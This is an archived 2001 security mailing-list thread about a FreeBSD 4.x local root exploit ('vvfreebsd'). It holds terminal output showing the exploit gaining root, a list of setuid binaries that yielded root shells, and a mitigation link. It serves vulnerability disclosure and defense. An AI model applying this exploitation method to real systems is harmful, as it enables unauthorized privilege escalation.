one@c0d4:/usr/home/c0d4$ uname
FreeBSD one.xxx.com.ar 4.1-RELEASE FreeBSD 4.1-RELEASE
one@c0d4:/usr/home/c0d4$ ./sig2
vvfreebsd. Written by Georgi Guninski
shall jump to bfbffe89
child=1371
login: # done
# id
uid=1000(c0d4) euid=0(root) gid=20(staff) groups=20(staff)
#

and with:

/usr/bin/chfn ; /usr/bin/chsh ; /usr/bin/ypchpass ; /usr/bin/ypchfn ;
/usr/bin/ypchsh ; /usr/bin/keyinit ; /usr/bin/login ; /usr/bin/passwd ;
/usr/libexec/sendmail/sendmail ; /usr/local/bin/kcheckpass ;
/usr/local/bin/icmpinfo

gave me a suid shell too.

On Wed, 11 Jul 2001, Przemyslaw Frasunek wrote:

> > Well, after a bunch of tests I've found only two suids which gave me
> > a suid shell:
> > /usr/bin/passwd
> > /usr/local/bin/ssh1
>
> /usr/bin/su also works for me:
>
> riget:venglin:~> egrep -e execl vvfreebsd.c
> if(!execl("/usr/bin/su","su","szymon",0))
>
> riget:venglin:~> ./v
> vvfreebsd. Written by Georgi Guninski
> shall jump to bfbffe72
> child=57660
> Password:done
> # id
> uid=0(root) gid=1001(users) groups=1001(users), 99(rexec)
>
> > So, quick workaround should be
>
> Quick workaround is to limit arguments, environment and filter non-ascii
> characters:
>
> http://www.frasunek.com/sources/security/rexec/
>
> --
> * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
> * Inet: przemyslawat_private ** PGP: D48684904685DF43EA93AFA13BE170BF *
This archive was generated by hypermail 2b30 : Sun Jul 15 2001 - 20:55:57 PDT